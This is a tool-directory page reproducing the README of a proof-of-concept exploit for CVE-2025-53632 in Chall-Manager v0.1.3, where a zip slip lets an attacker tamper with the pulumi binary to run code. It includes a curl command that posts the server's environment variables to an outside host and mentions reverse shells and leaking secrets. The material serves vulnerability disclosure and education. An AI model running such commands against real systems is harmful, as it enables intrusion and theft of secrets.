Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-53632 — An exploit of CVE-2025-53632 to confirm exploitability | Kitploit
Tools/GitHubGitHub/pandatix/cve-2025-53632
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubpandatix/cve-2025-53632

CVE-2025-53632

An exploit of CVE-2025-53632 to confirm exploitability

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-53632

This repository contains an exploit of CVE-2025-53632 affecting Chall-Manager < v0.1.4. The affected versions are clearly outdated and most probably used by nobody, so I'm confident there is no malicious exploitaiblity of the current.

This repository is not giving you the right to attack anybody, but meant for education purposes.

[!WARNING] The way Chall-Manager deals with scenarios, it is still completly exploitable without the zip slip: simply tamper the pulumi binary from the scenario such that the next execution runs your arbitrary code.

We demonstrates the attack over Chall-Manager v0.1.3.

Scenario

Let's imagine an exposed Chall-Manager (please don't do so, it is not meant to be as it is an RCE-on-demand app).

When creating a challenge, the scenario is validated by a Pulumi preview. There is no control over this very code, so we are able to inject anything.

To do so, Chall-Manager uses the auto API of Pulumi, which executes the Pulumi binary. It performs so with no absolute path, as it expects it to be at /pulumi/bin/pulumi ($PATH starts with /pulumi/bin).

Download Tool

Using these information, we are going to tamper the pulumi program by injecting some shell code ahead of its execution. As the scenario will then be validated, the tampered pulumi program will be executed, running the script.

From this script, you are now able to open a reverse shell, pivot through the infrastructure or within the container, leak secrets (e.g. contained in environment variables) or even challenge content (e.g. the challenge flag if one scenario has not been prebuilt).

Requirements

To run this exploit demo you'll need:

  • docker ;
  • go.

Exploit

  1. Run chall-manager.

    root@kitploit:~
    docker run --name chall-manager -d -p 8080:8080 ctferio/chall-manager:v0.1.3
    
  2. Run main.go

    root@kitploit:~
    go run main.go --url localhost:8080
    

    Be inventive with your script ! For instance, you can send system info to a third party...

    root@kitploit:~
    go run main.go --url localhost:8080 --script 'curl -d "$(env)" https://app.beeceptor.com/console/cve-2025-53632'
    
  3. You can stop the demo Chall-Manager Docker container once done.

    root@kitploit:~
    docker stop chall-manager && docker rm $_